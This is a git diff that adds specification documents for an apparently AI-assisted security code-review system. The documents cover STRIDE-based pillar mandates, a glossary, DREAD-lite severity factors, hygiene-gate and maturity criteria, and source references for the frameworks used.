+| **Data integrity** (data modified at rest or in transit) | data-protection | Missing checksums, weak cryptography, unsigned data, tampered logs, unverified file uploads |
+
+**Rule:** If malicious **input** changes the **behaviour** of the system, it's input-validation's finding. If data is **modified without detection** after it's been accepted, it's data-protection's finding.
+
+**Overlap handling:** Both pillars may flag the same file if it both accepts unvalidated input AND stores data without integrity checks. The synthesis step deduplicates — see Section 6 of `spec.md`.
+
+## Pillar Focus Areas
+
+Each pillar emphasises specific STRIDE categories and security properties. This is not exclusive — any pillar can flag any category — but these are the primary focus areas that each subagent should prioritise.
+
+### Authentication & Authorization pillar
+
+**Mandate:** Can attackers impersonate users or gain access they shouldn't have?
+
+| STRIDE focus | Why |
+|-------------|-----|
+| Spoofing | Authentication bypass is the most direct path to impersonation. Weak credentials, missing MFA, session hijacking. |
+| Elevation of Privilege | Broken access control is consistently in the OWASP Top 10. IDOR, role escalation, missing authorization checks. |
+
+| Property focus | Why |
+|---------------|-----|
+| Authenticity | Credential handling (hashing, transmission, storage), token security (JWT validation, session management), MFA. |
+| Authorization | RBAC/ABAC correctness, default-deny posture, object-level access control, privilege inheritance. |
+
+### Data Protection pillar
+
+**Mandate:** Can attackers access data they shouldn't see or modify data without detection?
+
+| STRIDE focus | Why |
+|-------------|-----|
+| Information Disclosure | Data breaches are among the most costly incidents. PII exposure, secrets in logs, excessive API responses. |
+| Tampering (Data integrity) | Undetected data modification leads to fraud, corruption, compliance violations. Missing checksums, weak crypto. |
+
+| Property focus | Why |
+|---------------|-----|
+| Confidentiality | Encryption at rest and in transit, data classification, masking in logs, data minimisation. |
+| Integrity | Cryptographic signatures, database constraints, tamper-evident storage, authenticated encryption. |
+
+### Input Validation pillar
+
+**Mandate:** Can malicious input alter the intended behaviour of the system?
+
+| STRIDE focus | Why |
+|-------------|-----|
+| Tampering (Injection) | Injection remains the most dangerous vulnerability class. SQL injection, command injection, and XSS can lead to complete system compromise. Most are trivially exploitable once found. |
+
+| Property focus | Why |
+|---------------|-----|
+| Integrity (Input) | Parameterised queries, allowlist validation, output encoding, safe deserialization, template sandboxing. |
+
+### Audit & Resilience pillar
+
+**Mandate:** Can users deny their actions? Can attackers disrupt service availability?
+
+| STRIDE focus | Why |
+|-------------|-----|
+| Repudiation | Without audit trails, incidents can't be investigated, compliance can't be proven, bad actors can't be held accountable. |
+| Denial of Service | A single attacker can take down a service without rate limiting or resource bounds, affecting all users. |
+
+| Property focus | Why |
+|---------------|-----|
+| Non-repudiability | Security event logging (who, what, when, where, outcome), tamper-evident log storage, cross-service correlation. |
+| Availability | Rate limiting (per-user, per-IP), resource bounds (request size, query limits, timeouts), abuse prevention. |
+
+## Coverage Matrix
+
+This matrix shows which STRIDE categories are covered by which pillar. Use it to verify that prompt changes don't create coverage gaps.
+
+| | Spoofing | Tampering (Injection) | Tampering (Integrity) | Repudiation | Info Disclosure | DoS | Elevation |
+|---|---|---|---|---|---|---|---|
+| **authn-authz** | Primary | - | - | - | - | - | Primary |
+| **data-protection** | - | - | Primary | - | Primary | - | - |
+| **input-validation** | - | Primary | - | - | - | - | - |
+| **audit-resilience** | - | - | - | Primary | - | Primary | - |
+
+**Key:** Primary = core focus area for this pillar. `-` = not a focus area (may still be flagged if found).
+
+### DREAD-lite severity factors per pillar
+
+Each pillar applies DREAD-lite factors differently based on its threat focus:
+
+| Pillar | Damage emphasis | Exploitability emphasis | Scope emphasis |
+|--------|----------------|----------------------|----------------|
+| authn-authz | Full compromise, identity theft | Auth bypass difficulty, credential requirements | All users vs single user |
+| data-protection | Data breach volume, data classification | Access path (public, authenticated, admin) | All data vs subset vs single record |
+| input-validation | RCE, data extraction, defacement | Input vector availability, preconditions | All endpoints vs single endpoint |
+| audit-resilience | Service disruption duration, evidence destruction | Resource cost to attack, automation potential | All users vs single service |
+
+## Inter-pillar Handoffs
+
+When a finding spans pillars, the subagent that discovers it should flag it in their own pillar's terms. The synthesis step deduplicates across pillars.
+
+Common handoff scenarios:
+
+| Scenario | Discovered by | Also relevant to |
+|----------|---------------|------------------|
+| Hardcoded API key both enables auth bypass and is a secret exposure | authn-authz or data-protection | Both — deduplicate during synthesis |
+| SQL injection both enables data extraction and constitutes an injection vulnerability | input-validation | data-protection (if data classification matters) |
+| Missing rate limiting on login endpoint enables both brute force and DoS | authn-authz or audit-resilience | Both — deduplicate during synthesis |
+| Audit log contains PII — relevant to both repudiation and information disclosure | audit-resilience | data-protection (PII in logs) |
+| Deserialization attack enables both code execution (injection) and data tampering | input-validation | data-protection (if persisted data is affected) |

--- a/spec/sec/glossary.md
+++ b/spec/sec/glossary.md
@@ -1,0 +1,145 @@
+# Glossary — Security Domain
+
+> Canonical definitions for all terms, frameworks, and acronyms used in the Security review domain. When writing or modifying prompts, use these definitions exactly.
+
+## Frameworks
+
+### STRIDE
+
+**Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege.** The structural framework that organises the Security review into threat categories, distributed across 4 pillars with dedicated subagents.
+
+Origin: Microsoft (Loren Kohnfelder and Praerit Garg, 1999). Widely adopted as a systematic threat modelling approach.
+
+| Category | Security Property | What to look for |
+|----------|------------------|-----------------|
+| **S**poofing | Authenticity | Can an attacker pretend to be someone else? Authentication bypass, credential theft, session hijacking. |
+| **T**ampering | Integrity | Can an attacker modify data they shouldn't? Input manipulation, data corruption, unauthorised writes. |
+| **R**epudiation | Non-repudiability | Can an attacker deny their actions? Missing audit logs, unsigned transactions, no accountability trail. |
+| **I**nformation Disclosure | Confidentiality | Can an attacker access data they shouldn't? Data leaks, excessive logging, exposed secrets. |
+| **D**enial of Service | Availability | Can an attacker disrupt the service? Resource exhaustion, algorithmic complexity, missing rate limits. |
+| **E**levation of Privilege | Authorization | Can an attacker gain unauthorised access? Privilege escalation, broken access control, insecure defaults. |
+
+### DREAD-lite
+
+A simplified severity scoring framework derived from Microsoft's original DREAD model. Uses three of the five original factors.
+
+| Factor | Question | HIGH | MEDIUM | LOW |
+|--------|----------|------|--------|-----|
+| **D**amage | What's the worst case? | Data breach, RCE, full compromise | Limited data access, partial control | Minor information leak |
+| **E**xploitability | How easy to exploit? | Trivial, no auth required | Requires specific conditions | Complex, requires insider access |
+| **A**ffected scope | How many users/systems? | All users, critical systems | Subset of users, non-critical | Single user, isolated system |
+
+**Usage:** DREAD-lite factors inform severity (HIGH/MEDIUM/LOW) but are not scored numerically. Reviewers assess each factor qualitatively and use the combination to determine overall severity.
+
+### STRIDE–Property Duality
+
+Every STRIDE threat has a corresponding security property that mitigates it. See `framework-map.md` for the complete mapping.
+
+| STRIDE threat | Defensive property |
+|---------------|-------------------|
+| Spoofing | Authenticity |
+| Tampering | Integrity |
+| Repudiation | Non-repudiability |
+| Information Disclosure | Confidentiality |
+| Denial of Service | Availability |
+| Elevation of Privilege | Authorization |
+
+## Pillars
+
+| Pillar | STRIDE categories | One-line mandate |
+|--------|------------------|-----------------|
+| **authn-authz** | Spoofing + Elevation of Privilege | Can attackers impersonate users or gain access they shouldn't have? |
+| **data-protection** | Information Disclosure + Tampering (integrity) | Can attackers access data they shouldn't see or modify data without detection? |
+| **input-validation** | Tampering (injection) | Can malicious input alter the intended behaviour of the system? |
+| **audit-resilience** | Repudiation + Denial of Service | Can users deny their actions? Can attackers disrupt service availability? |
+
+## Confidence Thresholds
+
+| Confidence | Threshold | Action | Examples |
+|------------|-----------|--------|----------|
+| **HIGH** | >80% | MUST REPORT | Clear SQL injection, hardcoded secrets, missing auth check on sensitive endpoint |
+| **MEDIUM** | 50-80% | REPORT with caveat | Potential race condition, possible bypass under specific conditions |
+| **LOW** | <50% | DO NOT REPORT | Theoretical attacks, defence-in-depth suggestions |
+
+**Design rationale:** Security reviews are especially prone to false positives. Reporting low-confidence findings erodes trust in the review process. Teams stop reading security reviews that cry wolf.
+
+## Exclusions
+
+Categories deliberately excluded from security review findings:
+
+| Excluded category | Reason | Handled by |
+|-------------------|--------|------------|
+| Test file vulnerabilities | Test code is not production code | N/A |
+| Documentation security issues | Docs describe, not implement | N/A |
+| Theoretical timing attacks | Without proven exploit path, these are noise | Dedicated security testing |
+| Missing hardening (defence-in-depth) | Absence of extra protection is not a vulnerability | Security maturity assessments |
+| Secrets in git history | Requires history scanning, not code review | git-secrets, TruffleHog, GitHub secret scanning |
+| Log spoofing | Low impact in most contexts | Operational monitoring |
+| Memory safety in memory-safe languages | Rust, Go, etc. handle this at the language level | N/A |
+| Outdated dependencies | Version-based vulnerability matching | Dependabot, Snyk, Renovate |
+| Missing rate limiting (unless trivially exploitable) | Operational concern unless directly exploitable | SRE domain |
+| Resource leaks | Memory/connection leaks are operational, not security | SRE domain |
+
+## Maturity Model
+
+### Hygiene Gate
+
+A promotion gate that overrides maturity levels. Any finding at any level is promoted to `HYG` if it passes any of these three consequence-severity tests:
+
+| Test | Question | Security examples |
+|------|----------|-------------------|
+| **Irreversible** | If this goes wrong, can the damage be undone? | User input concatenated into SQL or OS commands (data breach or RCE). API keys committed in source code (once pushed, compromised permanently). Authentication check missing on a destructive endpoint (data deleted). |
+| **Total** | Can this take down the entire service or cascade beyond its boundary? | Unbounded query with no pagination on a public endpoint (DoS). Missing rate limiting on authentication endpoint enabling resource exhaustion. |
+| **Regulated** | Does this violate a legal or compliance obligation? | PII logged without masking. Health data exposed in API responses. Payment card data stored without encryption. |
+
+Any "yes" to any test = `HYG`. The Hygiene flag trumps all maturity levels.
+
+### Maturity Levels
+
+Levels are cumulative. Each requires the previous. See `maturity-criteria.md` for detailed criteria with thresholds.
+
+| Level | Name | One-line description |
+|-------|------|---------------------|
+| **L1** | Foundations | The basics are in place. The system has authentication, validates input, and manages secrets. |
+| **L2** | Hardening | Security-hardened practices. The system has audit trails, rate limits, and least privilege. |
+| **L3** | Excellence | Best-in-class. Security is automated, encryption is configurable, dependencies are scanned. |
+
+### Severity Levels
+
+| Level | Exploitation impact | Merge decision |
+|-------|---------------------|----------------|
+| **HIGH** | Direct exploitation leads to RCE, data breach, or auth bypass | Must fix before merge |
+| **MEDIUM** | Requires conditions, significant impact if exploited | May require follow-up ticket |
+| **LOW** | Limited impact, defence-in-depth improvement | Nice to have |
+
+Severity measures **exploitation consequence**, not implementation difficulty.
+
+### Status Indicators
+
+Used in maturity assessment tables:
+
+| Indicator | Meaning |
+|-----------|---------|
+| `pass` | All criteria at this level are met |
+| `partial` | Some criteria met, some not |
+| `fail` | No criteria met, or critical criteria missing |
+| `locked` | Previous level not achieved; this level cannot be assessed |
+
+## Orchestration Terms
+
+| Term | Definition |
+|------|-----------|
+| **Pillar** | One of the 4 security focus areas (authn-authz, data-protection, input-validation, audit-resilience). Each pillar has one subagent. |
+| **Subagent** | A specialised reviewer that analyses code against one pillar's checklist. Runs in parallel with the other 3. |
+| **Skill orchestrator** | The `/review-security` skill that dispatches subagents, collects results, deduplicates, and synthesises the final report. |
+| **Synthesis** | The process of merging 4 subagent reports into one consolidated maturity assessment. |
+| **Deduplication** | When two subagents flag the same file:line, merging into one finding with the highest severity and most restrictive maturity tag. |
+
+## Output Terms
+
+| Term | Definition |
+|------|-----------|
+| **Finding** | A single identified vulnerability: severity, maturity level, confidence, STRIDE category, file location, description, exploit scenario, and recommendation. |
+| **Exploit scenario** | A concrete description of how an attacker would exploit the vulnerability. Required for every finding. |
+| **Maturity assessment** | Per-criterion evaluation (met/not met/partially met) for each maturity level. |
+| **Immediate action** | The single most important thing to fix. Hygiene failure if any exist, otherwise the top finding from the next achievable level. |

--- a/spec/sec/maturity-criteria.md
+++ b/spec/sec/maturity-criteria.md
@@ -1,0 +1,330 @@
+# Maturity Criteria — Security Domain
+
+> Detailed criteria for each maturity level with defined "sufficient" thresholds. Use this when assessing criteria as Met / Not met / Partially met.
+
+## Hygiene Gate
+
+The Hygiene gate is not a maturity level — it is a promotion gate. Any finding at any level that passes any of the three tests is promoted to `HYG`.
+
+### Test 1: Irreversible
+
+**Question:** If this goes wrong, can the damage be undone?
+
+**Threshold:** If exploitation would produce damage that requires more than a rollback/deploy to fix — e.g., data exfiltrated to an attacker, credentials that must be rotated across all consumers, user accounts compromised and misused, personally identifiable information leaked publicly — this is irreversible.
+
+**Security examples that trigger this test:**
+- SQL injection enabling data extraction — once data is exfiltrated, it cannot be un-leaked
+- Hardcoded credentials committed to source code — once pushed, the secret is in git history and must be rotated everywhere
+- Missing authentication on a destructive endpoint — deleted data cannot be recovered without backup restore
+- Remote code execution via deserialization — attacker has run arbitrary code on the server
+- XSS stealing session cookies where sessions persist after cookie theft — attacker's access outlasts the vulnerability fix
+
+**Security examples that do NOT trigger this test:**
+- Missing rate limiting on a non-sensitive endpoint (causes degradation, but no lasting damage)
+- Weak password hashing algorithm (requires additional steps to exploit — attacker needs the hashes first)
+- Missing audit logging (operational gap, but fixing it doesn't require undoing damage)
+
+### Test 2: Total
+
+**Question:** Can this take down the entire service or cascade beyond its boundary?
+
+**Threshold:** If exploitation can render the service completely unresponsive or cause cascading failure beyond the attacked component — e.g., resource exhaustion via unbounded queries, thread pool starvation via missing timeouts, denial of service affecting all users — this is total.
+
+**Security examples that trigger this test:**
+- Unbounded query on a public endpoint — attacker requests `SELECT * FROM million_row_table` causing database and application memory exhaustion
+- Missing timeout on external calls in the request path — one slow dependency blocks all worker threads
+- ReDoS on an unauthenticated endpoint — crafted input blocks the request-handling thread pool
+- No rate limiting on resource-intensive endpoint — attacker floods the service, affecting all users
+- Recursive processing without depth limits — deeply nested JSON/XML causes stack overflow
+
+**Security examples that do NOT trigger this test:**
+- Rate limiting missing on a single non-critical endpoint (localised impact)
+- Slow query that affects one endpoint but doesn't exhaust shared resources
+- DoS that requires authentication (limits the attacker pool)
+
+### Test 3: Regulated
+
+**Question:** Does this violate a legal or compliance obligation?
+
+**Threshold:** If the code would cause a breach of data protection law, financial regulation, health data requirements, or other legal obligations, this is regulated.
+
+**Security examples that trigger this test:**
+- PII (names, emails, SSNs, health data) written to log output without masking — violates GDPR, CCPA, HIPAA
+- Credit card numbers stored in plaintext — PCI-DSS violation
+- Health records accessible without access control — HIPAA violation
+- User data shared with third-party services without consent mechanisms — GDPR violation
+- Authentication data (passwords, tokens) logged in plaintext — credential exposure with regulatory implications
+
+**Security examples that do NOT trigger this test:**
+- Internal service-to-service tokens in logs (not PII, not regulated)
+- Missing encryption for non-regulated internal data
+- Debug endpoints exposing non-sensitive system information
+
+---
+
+## Level 1 — Foundations
+
+**Overall intent:** The basics are in place. The system has authentication, validates input, and manages secrets. An attacker cannot exploit the most common vulnerability classes.
+
+### Criterion 1.1: Authentication and authorisation are applied consistently on all protected paths
+
+**Definition:** Every endpoint that accesses or modifies user data, performs administrative functions, or triggers state changes has authentication and authorisation checks.
+
+**Met (sufficient):**
+- Authentication middleware or decorators applied to all non-public endpoints
+- Authorization checks verify the requesting user has access to the specific resource (not just "is logged in")
+- Default-deny posture — new endpoints are protected unless explicitly marked as public
+- Both horizontal (user A can't access user B's data) and vertical (regular users can't access admin) access controls exist
+
+**Partially met:**
+- Authentication exists on most endpoints but some sensitive endpoints are unprotected
+- Authentication exists but authorization is inconsistent (some endpoints check ownership, others don't)
+- Authorization exists but uses client-provided role claims without server-side verification
+
+**Not met:**
+- Sensitive endpoints with no authentication
+- Authentication without authorization (all authenticated users can access everything)
+- Authorization only at the UI layer, not at the API layer
+- No consistent pattern — each endpoint implements its own ad-hoc auth logic
+
+### Criterion 1.2: External input is validated before processing
+
+**Definition:** All input from external sources (HTTP parameters, request bodies, file uploads, headers) is validated before being used in operations.
+
+**Met (sufficient):**
+- SQL queries use parameterised queries or ORM with parameter binding (no string concatenation)
+- User input is never passed to shell commands, or if it is, arguments are passed as arrays with shell=False
+- Output is encoded for the appropriate context (HTML encoding for web output, etc.)
+- File paths from user input are canonicalised and validated against an allowlist
+- Deserialization uses safe loaders (`yaml.safe_load`, JSON with size limits, no `pickle.loads` on untrusted data)
+
+**Partially met:**
+- Some input paths are validated but others are not
+- ORM is used for most queries but some raw SQL with string interpolation exists
+- Server-side validation exists but is incomplete (validates type but not range/format)
+
+**Not met:**
+- SQL queries built with string concatenation or f-strings
+- User input passed to `os.system()`, `eval()`, or `exec()`
+- No server-side validation — reliance on client-side validation only
+- Deserialization of untrusted data with unsafe methods (pickle, marshal)
+
+### Criterion 1.3: Secrets are loaded from environment or external store, not source
+
+**Definition:** Credentials, API keys, tokens, and other secrets are not present in source code, configuration files committed to version control, or build artefacts.
+
+**Met (sufficient):**
+- Secrets loaded from environment variables, secret manager, or vault
+- No string literals that look like credentials in source code
+- `.env` files are in `.gitignore`
+- Different credentials for dev/staging/prod environments
+- Secrets are not present in Docker images or build logs
+
+**Partially met:**
+- Most secrets are externalised but some remain in configuration files
+- `.env.example` exists with placeholder values but the pattern encourages local `.env` files that could be committed
+- Secrets are in environment variables but are logged on application startup
+
+**Not met:**
+- API keys, passwords, or tokens as string literals in source code
+- Connection strings with credentials in configuration files committed to git
+- Secrets in Docker Compose files without environment variable override
+
+### Criterion 1.4: Sessions have explicit expiry and rotation
+
+**Definition:** User sessions have a defined lifetime, expire after inactivity, and tokens are rotated appropriately.
+
+**Met (sufficient):**
+- Session tokens or JWTs have explicit expiration times
+- Inactive sessions timeout (server-side enforcement, not just client-side)
+- Session tokens are regenerated after login (prevents session fixation)
+- Session cookies have appropriate flags: HttpOnly, Secure, SameSite
+
+**Partially met:**
+- Tokens have expiration but no inactivity timeout
+- Session regeneration on login but cookies lack security flags
+- JWT expiration set but no refresh token mechanism (users re-authenticate frequently)
+
+**Not met:**
+- Sessions never expire
+- No session fixation prevention (same session ID before and after login)
+- Session cookies without HttpOnly or Secure flags
+- JWT with no expiration claim
+
+---
+
+## Level 2 — Hardening
+
+**Overall intent:** Security-hardened practices. The system has audit trails, rate limits, and least privilege defaults. Defence-in-depth is established.
+
+**Prerequisite:** All L1 criteria must be met.
+
+### Criterion 2.1: Security-relevant actions produce audit records
+
+**Definition:** Actions that affect security state (authentication, authorisation, data access, data modification, admin operations) are logged with sufficient context for investigation.
+
+**Met (sufficient):**
+- Authentication events logged: login success/failure, logout, session creation
+- Authorization failures logged: who tried to access what and was denied
+- Data modification logged: who changed what (with old/new values masked if sensitive)
+- Admin actions logged: what was done, by whom, to what target
+- Logs include: actor identity, timestamp, action, target resource, outcome
+
+**Partially met:**
+- Some security events are logged but coverage is incomplete (e.g., login but not authorization failures)
+- Audit logs exist but lack critical context (no actor identity, or no outcome)
+- Logging exists but PII in logs is not masked
+
+**Not met:**
+- No audit logging for security events
+- Sensitive operations (deletion, permission changes) have no logging
+- Audit logs are generic ("action performed") without actor or resource identification
+
+### Criterion 2.2: Exposed endpoints enforce rate limits
+
+**Definition:** Publicly accessible endpoints have rate limiting to prevent abuse, brute force attacks, and resource exhaustion.
+
+**Met (sufficient):**
+- Authentication endpoints have rate limiting (per-IP and/or per-user)
+- Resource-intensive endpoints (search, export, file upload) have rate limits
+- Rate limiting is enforced server-side (not just client-side throttling)
+- Rate limit responses use appropriate status codes (429) and include retry-after information
+
+**Partially met:**
+- Rate limiting exists on authentication but not on other endpoints
+- Rate limiting exists but only per-IP (shared IPs can be unfairly limited, individual users on unique IPs are not limited)
+- Rate limiting exists at the infrastructure level but not visible in application code
+
+**Not met:**
+- No rate limiting on any endpoint
+- Authentication endpoint allows unlimited attempts
+- Resource-intensive endpoints have no protection against abuse
+
+### Criterion 2.3: Roles default to least privilege; access is granted explicitly
+
+**Definition:** Default permissions are restrictive. Users and service accounts start with no access and are granted permissions explicitly.
+
+**Met (sufficient):**
+- New users start with minimal permissions
+- Service accounts are scoped to the minimum required permissions
+- Admin functions require explicit role assignment (not just "any authenticated user")
+- API keys are scoped to specific operations and resources
+- Permission escalation requires explicit administrative action
+
+**Partially met:**
+- Default permissions are reasonable but overly broad in some areas
+- Service accounts exist but share a single set of broad permissions
+- Role separation exists but admin functions are accessible to too many roles
+
+**Not met:**
+- All authenticated users have the same permissions
+- Service accounts use root/admin credentials
+- No role-based access control — authorization is binary (authenticated or not)
+- API keys have full access with no scoping
+
+### Criterion 2.4: Error responses do not leak internal state or stack traces
+
+**Definition:** Error responses to clients contain enough information for the client to understand and handle the error, but do not expose internal implementation details.
+
+**Met (sufficient):**
+- Error responses use standardised error codes/messages
+- Stack traces are never returned to clients (logged server-side only)
+- Database query details, file paths, and internal service names are not in error responses
+- Sensitive data (credentials, PII, tokens) is never in error responses
+- Debug mode is disabled in production
+
+**Partially met:**
+- Most errors are sanitised but some edge cases leak details
+- Stack traces are suppressed in production but debug mode can be enabled via configuration
+- Error messages are generic but include internal error codes that reveal implementation details
+
+**Not met:**
+- Stack traces returned in error responses
+- SQL query text, database table names, or file paths in error messages
+- Credentials or PII in error responses
+- Debug mode enabled in production
+
+---
+
+## Level 3 — Excellence
+
+**Overall intent:** Best-in-class. Security is automated, encryption is configurable, and vulnerabilities are caught before they reach production.
+
+**Prerequisite:** All L2 criteria must be met.
+
+### Criterion 3.1: Security checks run automatically in the build pipeline
+
+**Definition:** Automated security analysis is integrated into the CI/CD pipeline so that vulnerabilities are caught before deployment.
+
+**Met (sufficient):**
+- Static analysis (SAST) runs on every pull request
+- Dependency scanning checks for known vulnerabilities
+- Security tests are part of the CI pipeline (not just manual reviews)
+- Pipeline fails or warns on critical security findings
+
+**Partially met:**
+- Some automated security checks exist but coverage is incomplete
+- Security scanning runs but results are not enforced (informational only)
+- Dependency scanning exists but static analysis does not (or vice versa)
+
+**Not met:**
+- No automated security checks in the pipeline
+- Security review is entirely manual
+- Dependency scanning is not automated
+
+### Criterion 3.2: Encryption parameters are configurable, not hardcoded
+
+**Definition:** Cryptographic algorithms, key sizes, and protocols can be changed without code modification (crypto-agility).
+
+**Met (sufficient):**
+- Encryption algorithms are configurable via configuration (not hardcoded in source)
+- TLS versions and cipher suites are configurable
+- Key rotation can be performed without code deployment
+- Deprecated algorithms can be disabled via configuration
+
+**Partially met:**
+- Some encryption parameters are configurable but others are hardcoded
+- Key rotation is possible but requires code changes
+- Algorithm selection is configurable but the default is a weak algorithm
+
+**Not met:**
+- Encryption algorithms hardcoded in source
+- Key rotation requires code change and deployment
+- No ability to update cryptographic parameters without code modification
+
+### Criterion 3.3: Dependencies are scanned for known vulnerabilities automatically
+
+**Definition:** Third-party dependencies are continuously monitored for known security vulnerabilities.
+
+**Met (sufficient):**
+- Dependency scanning runs on every build (Dependabot, Snyk, Renovate, or equivalent)
+- Critical vulnerability findings block deployment or create automated alerts
+- Dependency update process is documented and followed
+- Transitive dependencies are included in scanning
+
+**Partially met:**
+- Dependency scanning exists but runs periodically (not on every build)
+- Scanning exists but only covers direct dependencies (not transitive)
+- Alerts are generated but not systematically addressed
+
+**Not met:**
+- No automated dependency scanning
+- Dependencies are updated manually and infrequently
+- No process for responding to dependency vulnerabilities
+
+### Criterion 3.4: Threat modelling is practised for significant changes
+
+**Definition:** Significant architectural changes or new features go through a threat modelling process before implementation.
+
+**Met (sufficient):**
+- Evidence of threat modelling artefacts (threat models, DFDs, trust boundaries) in the codebase or documentation
+- Threat modelling is referenced in pull request templates or review processes
+- Security considerations are documented for architectural decisions
+
+**Partially met:**
+- Some threat modelling exists but is not consistent across changes
+- Security considerations are discussed in PRs but not formally documented
+
+**Not met:**
+- No evidence of threat modelling
+- Security is considered only reactively (after vulnerabilities are found)

--- a/spec/sec/references.md
+++ b/spec/sec/references.md
@@ -1,0 +1,133 @@
+# References — Security Domain
+
+> Source attribution for all frameworks, concepts, and terminology used in the Security review domain. Cite these when asked about the origin of a concept. Update this file when new sources are introduced.
+
+## Framework Origins
+
+### STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege)
+
+**Origin:** Microsoft. Created by Loren Kohnfelder and Praerit Garg in 1999.
+**Publication:** "The threats to our products" (internal Microsoft paper, 1999). Later formalised in Microsoft's Security Development Lifecycle (SDL).
+**Reference:** Adam Shostack, "Threat Modeling: Designing for Security" (2014, Wiley, ISBN 978-1118809990) provides the most comprehensive treatment of STRIDE in practice.
+**Status:** Industry-standard threat modelling framework. Used as the structural backbone of the Security review domain.
+**How it's used:** Organises the Security review into 6 threat categories distributed across 4 pillars. Each finding is tagged with one or more STRIDE categories.
+
+### DREAD (Damage, Reproducibility, Exploitability, Affected users, Discoverability)
+
+**Origin:** Microsoft, developed alongside STRIDE as part of SDL.
+**Status:** The full DREAD model is largely deprecated (Discoverability and Reproducibility proved too subjective). This project uses a simplified "DREAD-lite" variant with three factors: Damage, Exploitability, Affected scope.
+**How it's used:** Informs severity judgement (HIGH/MEDIUM/LOW) but is not scored numerically. Reviewers assess each factor qualitatively.
+
+### Maturity Model (Hygiene, L1, L2, L3)
+
+**Origin:** Original to this project.
+**Design history:**
+- PR #13/Issue #13: Initial maturity scoring concept — hygiene factors vs aspirational targets
+- PR #18: Added domain-specific maturity criteria to all 4 review domains
+- PR #19: Rewrote as universal Hygiene gate (Irreversible/Total/Regulated) with outcome-based levels. Removed technique names from criteria.
+
+**Key design decision (PR #19):** The Hygiene gate uses consequence-severity tests, not domain-specific checklists. This ensures the same escalation logic across Architecture, SRE, Security, and Data domains.
+
+## Books and Publications
+
+### Threat Modeling: Designing for Security
+
+**Author:** Adam Shostack
+**Published:** 2014, Wiley
+**ISBN:** 978-1118809990
+**Relevance:** Definitive guide to STRIDE-based threat modelling. Provides methodology for systematic threat identification, which informs the pillar structure and checklist design.
+**Specific concepts referenced:**
+- STRIDE-per-element (applying STRIDE to each component in a data flow diagram)
+- STRIDE-per-interaction (applying STRIDE to each data flow)
+- Threat trees and mitigations
+
+### The Web Application Hacker's Handbook (2nd Edition)
+
+**Authors:** Dafydd Stuttard, Marcus Pinto
+**Published:** 2011, Wiley
+**ISBN:** 978-1118026472
+**Relevance:** Practical web vulnerability exploitation techniques. Informs the "exploit scenario" requirement in findings and the input-validation pillar's checklist.
+**Specific areas referenced:**
+- SQL injection techniques and prevention
+- Authentication and session management attacks
+- Access control bypass patterns
+
+### OWASP Testing Guide (v4)
+
+**URL:** https://owasp.org/www-project-web-security-testing-guide/
+**Relevance:** Provides systematic testing methodology for each vulnerability category. Informs the checklist structure (what to look for in each area).
+
+### Application Security Verification Standard (ASVS)
+
+**URL:** https://owasp.org/www-project-application-security-verification-standard/
+**Relevance:** Provides a framework of security requirements and controls. The three ASVS levels (Level 1: Opportunistic, Level 2: Standard, Level 3: Advanced) informed the design of the L1/L2/L3 maturity criteria, though the specific criteria differ.
+
+### Secure by Design
+
+**Authors:** Dan Bergh Johnsson, Daniel Deogun, Daniel Sawano
+**Published:** 2019, Manning
+**ISBN:** 978-1617294358
+**Relevance:** Applying domain-driven design to security. Informed the "outcomes over techniques" design principle — security as a design quality rather than a checklist.
+
+## Standards and Industry References
+
+### OWASP Top 10
+
+**URL:** https://owasp.org/www-project-top-ten/
+**Version referenced:** 2021
+**Relevance:** Industry-standard ranking of web application vulnerability categories. The Security review's pillar structure covers all OWASP Top 10 categories:
+- A01:2021 Broken Access Control → authn-authz pillar
+- A02:2021 Cryptographic Failures → data-protection pillar
+- A03:2021 Injection → input-validation pillar
+- A04:2021 Insecure Design → cross-cutting (covered by maturity model)
+- A05:2021 Security Misconfiguration → cross-cutting
+- A06:2021 Vulnerable and Outdated Components → excluded (dependency scanning)
+- A07:2021 Identification and Authentication Failures → authn-authz pillar
+- A08:2021 Software and Data Integrity Failures → input-validation (deserialization) + data-protection (integrity)
+- A09:2021 Security Logging and Monitoring Failures → audit-resilience pillar
+- A10:2021 Server-Side Request Forgery → input-validation pillar
+
+### Common Weakness Enumeration (CWE)
+
+**URL:** https://cwe.mitre.org/
+**Relevance:** Provides standardised identifiers for vulnerability types. While the Security review does not tag findings with CWE IDs (to keep output concise), the anti-patterns catalogue maps to known CWEs:
+- CWE-89: SQL Injection (IV-01)
+- CWE-78: OS Command Injection (IV-02)
+- CWE-79: Cross-Site Scripting (IV-03)
+- CWE-22: Path Traversal (IV-04)
+- CWE-502: Deserialization of Untrusted Data (IV-05)
+- CWE-798: Use of Hard-coded Credentials (DP-01, AA-05)
+- CWE-862: Missing Authorization (AA-01)
+- CWE-639: Authorization Bypass Through User-Controlled Key (AA-02)
+
+### NIST Cybersecurity Framework
+
+**URL:** https://www.nist.gov/cyberframework
+**Relevance:** The five NIST functions (Identify, Protect, Detect, Respond, Recover) broadly align with the pillar structure. The Security review focuses primarily on Protect (authn-authz, data-protection, input-validation) and Detect (audit-resilience).
+
+### The Twelve-Factor App
+
+**URL:** https://12factor.net/
+**Relevance:** Factor III (Config) informs the secrets management criteria (secrets from environment, not code). Factor XII (Admin processes) informs audit logging requirements.
+
+## Project History
+
+Key PRs that shaped the Security domain, in chronological order:
+
+| PR | What changed | Design impact |
+|----|-------------|---------------|
+| #4 | Initial Security review system | Established STRIDE + DREAD-lite architecture, 4 subagents, prompt structure. Stacked on #3 (SRE). |
+| #17 | Fix input-validation deserialization severity | Separated always-unsafe (pickle/marshal) from loader-dependent (YAML/XML/JSON). Established that deserialization risk varies by mechanism. |
+| #18 | Cascading maturity model added | Domain-specific maturity criteria (HYG/L1/L2/L3) in `_base.md` and `SKILL.md` |
+| #19 | Universal Hygiene gate, outcome-based levels | Removed technique names from criteria. Hygiene uses consequence-severity tests. Added Maturity column to all 4 security agent output tables. |
+| #21 | Batch orchestrator `/review-all` | Security runs as one of 4 parallel domains, results in `sec.md` sub-report |
+| #23 | Namespace attempt (closed) | Skill namespacing via subdirectories didn't work. Led to plugin-based approach (`donkey-dev/`). Files now live under `donkey-dev/` directory. |
+
+## Attribution Gaps
+
+The following require source confirmation:
+
+| Term | Current status | Action needed |
+|------|---------------|---------------|
+| DREAD-lite | Simplified variant used without formal citation | Confirm whether this specific 3-factor variant (DEA) has been published elsewhere, or declare as original to this project |
